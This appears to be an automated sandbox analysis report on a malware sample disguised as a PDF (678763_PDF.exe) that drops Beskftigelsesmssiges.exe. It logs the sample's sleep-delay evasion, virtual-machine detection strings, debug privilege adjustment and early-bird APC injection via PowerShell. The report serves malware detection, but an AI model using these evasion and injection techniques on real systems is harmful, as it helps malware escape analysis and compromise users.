Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8238	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1409	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Window / User API: threadDelayed 7930	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Window / User API: threadDelayed 1899	Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

API coverage: 0.0 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8076	Thread sleep count: 7930 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8076	Thread sleep count: 1899 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072	Thread sleep time: -594110s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C63
Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_004068B4 FindFirstFileW,FindClose,	0_2_004068B4
Source: C:\Users\user\Desktop\678763_PDF.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_00402910 FindFirstFileW,	6_2_00402910
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Code function: 6_2_004068B4 FindFirstFileW,FindClose,	6_2_004068B4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: powershell.exe, 00000001.00000002.2144153415.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2144153415.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\^q
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 678763_PDF.exe, 00000000.00000002.1725978609.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1476a1d87ad0<
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2144153415.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\^q
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6"
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd144b65092187<
Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@d

Source: C:\Users\user\Desktop\678763_PDF.exe	API call chain: ExitProcess graph end node	graph_0-3285
Source: C:\Users\user\Desktop\678763_PDF.exe	API call chain: ExitProcess graph end node	graph_0-3437
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	API call chain: ExitProcess graph end node	graph_6-7946
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	API call chain: ExitProcess graph end node	graph_6-7941

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe base: 16D0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
